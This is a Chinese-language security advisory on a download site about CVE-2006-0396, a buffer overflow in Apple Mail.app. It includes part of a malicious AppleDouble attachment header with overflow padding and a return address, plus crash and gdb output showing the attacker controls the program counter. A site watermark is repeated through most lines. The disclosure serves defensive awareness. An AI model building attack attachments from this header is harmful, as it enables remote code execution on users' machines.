描述:BUGTRAQ ID: 17081YVW苹果软件下载站 CVE(CAN) ID: CVE-2006-0396YVW苹果软件下载站 YVW苹果软件下载站 Apple Mac OS X是苹果家族电脑所使用的***作系统。YVW苹果软件下载站 YVW苹果软件下载站 Apple Mac OS X的2006-001安全更新存在缓冲区溢出漏洞,攻击者可能利用此漏洞在机器上执行任意指令。YVW苹果软件下载站 YVW苹果软件下载站 在安装Apple的2006-001安全更新后,Mail.app中存在缓冲区溢出漏洞。攻击者可以发送包含有AppleDouble头信息的特制MIME封装Macintosh文件来触发这个漏洞。例如:YVW苹果软件下载站 YVW苹果软件下载站 "\x00\x05\x16\x07". # AppleDouble Magic NumberYVW苹果软件下载站 "\x00\x02\x00\x00". # Version 2YVW苹果软件下载站 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of fillerYVW苹果软件下载站 "\x00\x03\x00\x00". # Number of entries (3)YVW苹果软件下载站 "\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'YVW苹果软件下载站 "\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3eYVW苹果软件下载站 "\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10YVW苹果软件下载站 "\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'YVW苹果软件下载站 "\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48YVW苹果软件下载站 "\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245YVW苹果软件下载站 "\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'YVW苹果软件下载站 "\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013dYVW苹果软件下载站 "\x05\x3a\x00\x00". # Length of Resource fork is 0x053aYVW苹果软件下载站 "\x00\x00\x00\x00". # <null> fillerYVW苹果软件下载站 "\x00\x00\x00\x00". # <null> fillerYVW苹果软件下载站 "A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.YVW苹果软件下载站 ...YVW苹果软件下载站 YVW苹果软件下载站 如果Mail.app收件箱中收到了有上述首部的消息的话,用户就只能看到Real Name项所提供的名称的前11个字符,在这个例子中是“AAAAAAAAAAA...mov”。其他例子还可能包括“SuperTastey...mov”或“NakedChicks...mov”等。YVW苹果软件下载站 YVW苹果软件下载站 如果双击了附件文件,就会导致以下dump:YVW苹果软件下载站 YVW苹果软件下载站 Date/Time: 2006-03-04 10:35:32.472 -0500YVW苹果软件下载站 OS Version: 10.4.5 (Build 8H14)YVW苹果软件下载站 Report Version: 4YVW苹果软件下载站 YVW苹果软件下载站 Command: MailYVW苹果软件下载站 Path: /Applications/Mail.app/Contents/MacOS/MailYVW苹果软件下载站 Parent: WindowServer [64]YVW苹果软件下载站 YVW苹果软件下载站 Version: 2.0.7 (746.2)YVW苹果软件下载站 Build Version: 1YVW苹果软件下载站 Project Name: MailViewerYVW苹果软件下载站 Source Version: 7460200YVW苹果软件下载站 YVW苹果软件下载站 PID: 271YVW苹果软件下载站 Thread: 0YVW苹果软件下载站 YVW苹果软件下载站 Exception: EXC_BAD_ACCESS (0x0001)YVW苹果软件下载站 Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140YVW苹果软件下载站 YVW苹果软件下载站 在gdb可以看到有几处溢出:YVW苹果软件下载站 YVW苹果软件下载站 (gdb) btYVW苹果软件下载站 #0 0x41424344 in ?? ()YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 Cannot access memory at address 0x31313131YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 #1 0x41424344 in ?? ()YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 Cannot access memory at address 0x31313131YVW苹果软件下载站 warning: Previous frame identical to this frame (corrupt stack?)YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 Cannot access memory at address 0x41424344YVW苹果软件下载站 Cannot access memory at address 0x31313139YVW苹果软件下载站 YVW苹果软件下载站 这样就控制了r0、pc、lr和一半的r31。YVW苹果软件下载站 YVW苹果软件下载站 (gdb) i r $r0 $pc $lr $r31YVW苹果软件下载站 r0 0x41424344 1094861636YVW苹果软件下载站 pc 0x41424344 1094861636YVW苹果软件下载站 lr 0x41424344 1094861636YVW苹果软件下载站 r31 0x18b3030 25899056YVW苹果软件下载站 YVW苹果软件下载站 成功利用这个漏洞的攻击者可以远程执行任意指令。YVW苹果软件下载站 YVW苹果软件下载站 <*来源:Kevin Finisterre (dotslash@snosoft.com)YVW苹果软件下载站 YVW苹果软件下载站 链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114235372215398&w=2YVW苹果软件下载站 *>YVW苹果软件下载站
![故宫网上虚拟三维紫禁城客户端下载[故宫博物院与IBM合作项目]](http://www.macdown.com/d/file/macsoft/professional/otherpro/2008-10-15/6499067417332c05ed82f51f2aeb8f45.jpg)
